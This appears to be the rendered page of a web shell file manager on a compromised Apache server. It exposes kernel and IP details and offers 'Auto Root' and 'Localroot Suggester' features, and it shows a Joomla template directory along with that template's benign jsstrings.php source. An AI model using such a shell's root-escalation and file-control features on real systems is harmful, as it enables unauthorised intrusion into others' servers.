Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
paroquia-rm.20231013 /
templates /
beez3 /
Delete
Unzip
Name
Size
Permission
Date
Action
css
[ DIR ]
drwxr-xr-x
2017-09-19 09:00
html
[ DIR ]
drwxr-xr-x
2017-09-19 09:00
images
[ DIR ]
drwxr-xr-x
2017-09-19 09:00
javascript
[ DIR ]
drwxr-xr-x
2017-09-19 09:00
language
[ DIR ]
drwxr-xr-x
2017-09-19 09:00
component.php
1.98
KB
-rw-r--r--
2019-05-07 05:34
error.php
8.32
KB
-rw-r--r--
2019-05-07 05:34
favicon.ico
1.97
KB
-rw-r--r--
2019-05-07 05:34
index.php
8.65
KB
-rw-r--r--
2019-05-07 05:34
jsstrings.php
1.41
KB
-rw-r--r--
2019-05-07 05:34
templateDetails.xml
4.53
KB
-rw-r--r--
2019-05-07 05:34
template_preview.png
115.75
KB
-rw-r--r--
2019-05-07 05:34
template_thumbnail.png
21.44
KB
-rw-r--r--
2019-05-07 05:34
Save
Rename
<?php /** * @package Joomla.Site * @subpackage Templates.beez3 * * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ // No direct access. defined('_JEXEC') or die; JText::script('TPL_BEEZ3_ALTOPEN'); JText::script('TPL_BEEZ3_ALTCLOSE'); JText::script('TPL_BEEZ3_TEXTRIGHTOPEN'); JText::script('TPL_BEEZ3_TEXTRIGHTCLOSE'); JText::script('TPL_BEEZ3_FONTSIZE'); JText::script('TPL_BEEZ3_BIGGER'); JText::script('TPL_BEEZ3_RESET'); JText::script('TPL_BEEZ3_SMALLER'); JText::script('TPL_BEEZ3_INCREASE_SIZE'); JText::script('TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT'); JText::script('TPL_BEEZ3_DECREASE_SIZE'); JText::script('TPL_BEEZ3_OPENMENU'); JText::script('TPL_BEEZ3_CLOSEMENU'); $this->addScriptDeclaration(" var big = '" . (int) $this->params->get('wrapperLarge') . "%'; var small = '" . (int) $this->params->get('wrapperSmall') . "%'; var bildauf = '" . $this->baseurl . '/templates/' . $this->template . "/images/plus.png'; var bildzu = '" . $this->baseurl . '/templates/' . $this->template . "/images/minus.png'; var rightopen = '" . JText::_('TPL_BEEZ3_TEXTRIGHTOPEN', true) . "'; var rightclose = '" . JText::_('TPL_BEEZ3_TEXTRIGHTCLOSE', true) . "'; var altopen = '" . JText::_('TPL_BEEZ3_ALTOPEN', true) . "'; var altclose = '" . JText::_('TPL_BEEZ3_ALTCLOSE', true) . "'; ");